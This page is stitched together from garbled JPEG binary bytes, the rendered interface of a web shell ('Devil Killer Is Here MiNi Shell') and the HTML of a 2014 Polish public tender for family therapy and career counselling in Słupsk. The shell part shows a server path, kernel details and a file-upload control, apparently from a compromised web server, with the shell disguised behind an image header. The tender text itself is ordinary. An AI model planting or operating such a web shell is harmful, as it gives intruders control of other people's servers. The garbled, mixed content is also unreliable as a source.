JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140623/134039-N-2014.html

<p class="kh_header"><b>Słupsk: Przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie terapii systemowej rodzin oraz doradztwa zawodowego dla rodzin wielodzietnych z powiatu słupskiego - uczestników projektu pilotażowego pn. Schematom STOP! Wspólne działania instytucji pomocy społecznej i instytucji rynku pracy - pilotaż, współfinansowanego przez Unie Europejską ze środków Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki 2007 - 2013 Działanie 1.2 Wsparcie systemowe instytucji pomocy i integracji społecznej.</b><br>
<b>Numer ogłoszenia: 134039 - 2014; data zamieszczenia: 23.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , Al. Sienkiewicza 20, 76-200 Słupsk, woj. pomorskie, tel. 59 8414311, faks 59 841 0196.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pcpr.slupsk.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie terapii systemowej rodzin oraz doradztwa zawodowego dla rodzin wielodzietnych z powiatu słupskiego - uczestników projektu pilotażowego pn. Schematom STOP! Wspólne działania instytucji pomocy społecznej i instytucji rynku pracy - pilotaż, współfinansowanego przez Unie Europejską ze środków Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki 2007 - 2013 Działanie 1.2 Wsparcie systemowe instytucji pomocy i integracji społecznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie realizowane będzie poprzez różne formy wsparcia w poniższych zakresach tematycznych:
Część I - Terapia systemowa rodzin
1.	Grupa docelowa: Terapią systemową objęte zostaną 4 rodziny wielodzietne z powiatu słupskiego.
2.	Cel terapii systemowej rodzin oraz zakres merytoryczny: zdiagnozowanie problemów, z jakimi borykają się poszczególne rodziny, a następnie zmiana struktury rodziny (w sytuacji kryzysu) lub jej granic (w przypadku gdy problem dotyczy zbyt płynnych, lub zbyt sztywnych granic). Rezultatem terapii powinny być przeorganizowane relacje zaburzające funkcjonowanie rodziny, rozwiązane konflikty i kryzysy, odbudowane właściwe relacje z dziećmi.
3.	Czas trwania terapii: łącznie przeprowadzonych zostanie 80 godzin zegarowych terapii, co stanowi średnio 20 godzin zegarowych na 1 rodzinę wielodzietną wykorzystywanych przez rodzinę w zależności od indywidualnych potrzeb zarówno w godzinach południowych, jak i popołudniowych (w sytuacji gdy dana rodzina nie będzie wymagała terapii w ilości 20 godzin, pozostałe godziny przeznaczone zostaną na pracę indywidualną z pozostałymi rodzinami wymagającymi intensywniejszego wsparcia).
4.	Zamówienie realizowane będzie w formie indywidualnych spotkań terapeuty z rodziną w łącznej liczbie średnio 20 godzin zegarowych na jedną rodzinę (spotkania będą odbywały się terminach dostosowanych do indywidualnych potrzeb rodzin).
5.	Termin realizacji zamówienia: od 15.07.2014 r. do 30.10.2014 r. w godzinach i terminach indywidualnie dostosowanych do potrzeb danej rodziny, przy czym zakłada się, że terapie rodzin będą się odbywały systematycznie, tj. średnio 20 godzin w miesiącu. Spotkania będą odbywały się w dni robocze od poniedziałku do piątku.
6.	Miejsce realizacji zamówienia: siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku, przy Al. Sienkiewicza 20 (zapewnienie sali szkoleniowej oraz poniesienie kosztów związanych z dojazdem uczestników na indywidualne poradnictwo leży po stronie Zamawiającego). 
7.	Wykonawca zobowiązany jest do:
1)	przeprowadzenia systemowej terapii rodzin wielodzietnych w terminach uzgadnianych na bieżąco w trakcie trwania umowy  z wyprzedzeniem co najmniej trzydniowym;
2)	prowadzenia dokumentacji przebiegu terapii (indywidualna karta pracy z rodziną);
3)	zapewnienia akcesoriów niezbędnych do przeprowadzenia terapii;
4)	sporządzenia rodzinnych genogramów obrazujących relacje członków rodziny, specyficzne przekazy, delegacje itp.;
5)	sporządzenia indywidualnych opinii psychologicznych nt. każdej rodziny uwzględniających efekty pracy z rodziną, motywację, mocne strony oraz wskazania dotyczące dalszej pracy;
6)	oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem w/w terapii zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013.

Część II - Doradztwo zawodowe grupowe i indywidualne
1.	Grupa docelowa: doradztwem zawodowym grupowym i indywidualnym objętych zostanie 11 osób z rodzin wielodzietnych powiatu słupskiego.
2.	Cel doradztwa zawodowego: wzrost umiejętności poruszania się po rynku pracy, przygotowanie uczestników do ich samodzielnego wyjścia na lokalny rynek pracy.
3.	Zamówienie realizowane będzie w dwóch etapach:
1)	I etap - warsztat grupowy prowadzony w jednej 11-osobowej grupie;
2)	II etap - indywidualne konsultacje z doradcą zawodowym;

4.	Etap I: warsztat grupowy z doradztwa zawodowego
1)	Zakres tematyczny I etapu warsztatów z doradztwa zawodowego obejmuje zasady autoprezentacji, komunikowania się z potencjalnym pracodawcą przed zatrudnieniem i w trakcie zatrudnienia, zasady sporządzania dokumentów aplikacyjnych, analiza lokalnego rynku pracy, umiejętność poruszania się po rynku pracy, szukania ofert pracy, sposoby oraz zasady składania dokumentów aplikacyjnych (80% czasu trwania warsztatów przeprowadzić należy za pomocą aktywnych metod pracy z grupą).
2)	Czas trwania I etapu warsztatu grupowego z doradztwa zawodowego: 16 godzin dydaktycznych (4 spotkania po 4 godziny dydaktyczne).
3)	Miejsce realizacji I etapu warsztatu: siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy Al. Sienkiewicza 20 (zapewnienie Sali szkoleniowej, poczęstunku, zwrotu kosztów przejazdu uczestników projektu na zajęcia grupowe leży po stronie Zamawiającego).
4)	Termin realizacji I etapu warsztatu grupowego z doradztwa zawodowego: do 15.08.2014 r. w godzinach od 09.00 do maksymalnie 16.00 godziny. Dokładny terminarz zajęć ustalony zostanie z Wykonawcą na etapie podpisania umowy. Spotkania będą odbywały się w dni robocze od poniedziałku do piątku.
5.	Etap II: Indywidualne konsultacje z doradcą zawodowym
1)	Zakres indywidualnych konsultacji z doradca zawodowym: sporządzenie wspólnie z uczestnikiem konsultacji dokumentów aplikacyjnych (CV, przykładowy list motywacyjny odpowiadający na przykładową ofertę pracy zgodną z predyspozycjami zawodowymi  danej osoby). Konsultacje prowadzone przy komputerze, efektem końcowym konsultacji będzie przygotowane i wydrukowane CV oraz list motywacyjny.
2)	Czas trwania indywidualnych konsultacji z doradcą zawodowym: 2 godziny zegarowe na jedną osobę, co stanowi łącznie 22 godziny zegarowe. Terminy spotkań indywidualnych dostosowane zostaną do indywidualnych potrzeb uczestników konsultacji
3)	Miejsce realizacji II etapu doradztwa: siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy  Al. Sienkiewicza 20 (zapewnienie Sali szkoleniowej, zwrotu kosztów przejazdu uczestników projektu na zajęcia indywidualne leży po stronie Zamawiającego).
4)	Termin realizacji II etapu doradztwa zawodowego: od 15.07.2014 r. do 30.09.2014 r. w godzinach od 08.00 do maksymalnie 16.00 godziny. Spotkania będą odbywały się w dni robocze od poniedziałku do piątku.
6.	Wykonawca zobowiązany jest do:
1)	przeprowadzenia doradztwa zawodowego w dwóch etapach;
2)	zapewnienia materiałów szkoleniowych dla każdego uczestnika projektu (w tym jeden dodatkowy do dokumentacji projektowej);
3)	przeprowadzenia ankiety początkowej (w pierwszym dniu zajęć I etapu warsztatów) i końcowej (w ostatnim dniu zajęć I etapu warsztatów) badających poziom wiedzy i umiejętności z zakresu poruszania się po rynku pracy;
4)	przygotowania konspektów grupowych zajęć warsztatowych;
5)	prowadzenia dziennika zajęć, karty czasu pracy trenera, list obecności (dotyczy I etapu doradztwa zawodowego) oraz indywidualnych kart doradztwa zawodowego (dotyczy II etapu doradztwa zawodowego);
6)	sporządzenia indywidualnych opinii nt. każdego uczestnika warsztatu na podstawie przeprowadzonych ankiet początkowych i końcowych badających ich poziom wiedzy i umiejętności z zakresu objętego przedmiotem zamówienia w części nr IV;
7)	przygotowania dokumentów aplikacyjnych (CV, list motywacyjny) dla każdego uczestnika doradztwa zawodowego oraz przekazania ich każdemu uczestnikowi w wersji papierowej i elektronicznej;
8)	przekazania Zamawiającemu dokumentów aplikacyjnych każdego uczestnika doradztwa zawodowego w wersji papierowej i elektronicznej;
9)	zapewnienie akcesoriów niezbędnych do przeprowadzenia doradztwa zawodowego, w tym sprzętu komputerowego do sporządzenia i wydrukowania dokumentów aplikacyjnych;
10)	oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów i indywidualnych konsultacji zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, do 50% wartości zamówienia podstawowego, polegających na powtórzeniu tych samych zajęć w przypadku, jeżeli zamówiona ilość okaże się niewystarczająca lub jeżeli zaistnieje konieczność skierowania do udziału większej ilości Uczestników i/lub jeżeli w okresie następnych trzech lat od podpisania umowy koniecznym okaże się nabycie usług tożsamych z przedmiotem zamówienia, na przykład w ramach kolejnych projektów EFS i/lub w ramach podstawowej działalności zamawiającego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie uprawnień do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania - oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie wiedzy i doświadczenia - oświadczenie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym - oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia zostanie uznany za spełniony, jeżeli Wykonawca dołączy do oferty wykaz osób, które będą uczestniczyć w
wykonywaniu zamówienia, z którego będzie wynikało, że:
Część I
Wykonawca dysponuje co najmniej jedną osobą, która przeprowadzi terapię systemową rodzin, posiadającą wykształcenie co najmniej magisterskie psychologiczne od co najmniej 4 lat licząc do terminu do składania ofert, ukończony co najmniej kurs podstawowy I stopnia systemowej terapii rodzin oraz posiadającą doświadczenie w prowadzeniu zajęć terapii systemowej rodzin, czyli przeprowadziła co najmniej 60 godzin terapii systemowej, w tym co najmniej 20 godzin terapii przeprowadzonych z jedną rodziną. 

Część II
Wykonawca dysponuje co najmniej jedną osobą, która przeprowadzi doradztwo zawodowe grupowe i indywidualne, posiadającą co najmniej wykształcenie wyższe, posiadającą co najmniej roczne doświadczenie w pracy na stanowisku doradcy zawodowego/pośrednika pracy oraz posiadającą doświadczenie w prowadzeniu zajęć warsztatowych/szkoleń/innych tożsamych zajęć grupowych z zakresu doradztwa zawodowego, czyli przeprowadziła co najmniej pięć warsztatów/szkoleń/innych zajęć grupowych z zakresu doradztwa zawodowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwości dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach:
1)	w uzasadnionych przypadkach za zgodą Zamawiającego możliwa jest zmiana terminów realizacji zamówienia,
2)	harmonogram i program stanowiące załączniki do umowy mogą podlegać modyfikacji w uzasadnionych przypadkach za porozumieniem obu stron, przy czym zmiany te mogą nastąpić na wniosek Wykonawcy wyłącznie na trzy dni przed terminem spotkania wynikającego z harmonogramu (dotyczy części nr II),
3)	osoby wskazane w ofercie jako odpowiedzialne za świadczenie usług za zgodą Zamawiającego będą mogły zostać zastąpione innymi o nie niższych kwalifikacjach, doświadczeniu i wykształceniu określonych w SIWZ, przy czym zmiany te mogą nastąpić na wniosek Wykonawcy wyłącznie na trzy dni przed terminem spotkania wynikającego z harmonogramu,
4)	zmianie mogą podlegać omyłki pisarskie nie rzutujące na zamiar i cel stron wynikający z umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pcpr.slupsk.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Słupsku, 76-200 Słupsk, al. Sienkiewicza 20, woj. pomorskie, pok. nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2014 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Słupsku, 76-200 Słupsk, al. Sienkiewicza 20, woj. pomorskie, pok. nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pilotażowy pn Schematom STOP! Wspólne działania instytucji pomocy społecznej i instytucji rynku pracy - pilotaż, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki 2007-2013 Działanie 1.2 Wsparcie systemowe instytucji pomocy i integracji społeczne.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Terapia systemowa rodzin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Grupa docelowa: Terapią systemową objęte zostaną 4 rodziny wielodzietne z powiatu słupskiego.
2.	Cel terapii systemowej rodzin oraz zakres merytoryczny: zdiagnozowanie problemów, z jakimi borykają się poszczególne rodziny, a następnie zmiana struktury rodziny (w sytuacji kryzysu) lub jej granic (w przypadku gdy problem dotyczy zbyt płynnych, lub zbyt sztywnych granic). Rezultatem terapii powinny być przeorganizowane relacje zaburzające funkcjonowanie rodziny, rozwiązane konflikty i kryzysy, odbudowane właściwe relacje z dziećmi.
3.	Czas trwania terapii: łącznie przeprowadzonych zostanie 80 godzin zegarowych terapii, co stanowi średnio 20 godzin zegarowych na 1 rodzinę wielodzietną wykorzystywanych przez rodzinę w zależności od indywidualnych potrzeb zarówno w godzinach południowych, jak i popołudniowych (w sytuacji gdy dana rodzina nie będzie wymagała terapii w ilości 20 godzin, pozostałe godziny przeznaczone zostaną na pracę indywidualną z pozostałymi rodzinami wymagającymi intensywniejszego wsparcia).
4.	Zamówienie realizowane będzie w formie indywidualnych spotkań terapeuty z rodziną w łącznej liczbie średnio 20 godzin zegarowych na jedną rodzinę (spotkania będą odbywały się terminach dostosowanych do indywidualnych potrzeb rodzin).
5.	Termin realizacji zamówienia: od 15.07.2014 r. do 30.10.2014 r. w godzinach i terminach indywidualnie dostosowanych do potrzeb danej rodziny, przy czym zakłada się, że terapie rodzin będą się odbywały systematycznie, tj. średnio 20 godzin w miesiącu. Spotkania będą odbywały się w dni robocze od poniedziałku do piątku.
6.	Miejsce realizacji zamówienia: siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku, przy Al. Sienkiewicza 20 (zapewnienie sali szkoleniowej oraz poniesienie kosztów związanych z dojazdem uczestników na indywidualne poradnictwo leży po stronie Zamawiającego). 
7.	Wykonawca zobowiązany jest do:
1)	przeprowadzenia systemowej terapii rodzin wielodzietnych w terminach uzgadnianych na bieżąco w trakcie trwania umowy  z wyprzedzeniem co najmniej trzydniowym;
2)	prowadzenia dokumentacji przebiegu terapii (indywidualna karta pracy z rodziną);
3)	zapewnienia akcesoriów niezbędnych do przeprowadzenia terapii;
4)	sporządzenia rodzinnych genogramów obrazujących relacje członków rodziny, specyficzne przekazy, delegacje itp.;
5)	sporządzenia indywidualnych opinii psychologicznych nt. każdej rodziny uwzględniających efekty pracy z rodziną, motywację, mocne strony oraz wskazania dotyczące dalszej pracy;
6)	oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem w/w terapii zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Doradztwo zawodowe grupowe i indywidualne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Grupa docelowa: doradztwem zawodowym grupowym i indywidualnym objętych zostanie 11 osób z rodzin wielodzietnych powiatu słupskiego.
2.	Cel doradztwa zawodowego: wzrost umiejętności poruszania się po rynku pracy, przygotowanie uczestników do ich samodzielnego wyjścia na lokalny rynek pracy.
3.	Zamówienie realizowane będzie w dwóch etapach:
1)	I etap - warsztat grupowy prowadzony w jednej 11-osobowej grupie;
2)	II etap - indywidualne konsultacje z doradcą zawodowym;

4.	Etap I: warsztat grupowy z doradztwa zawodowego
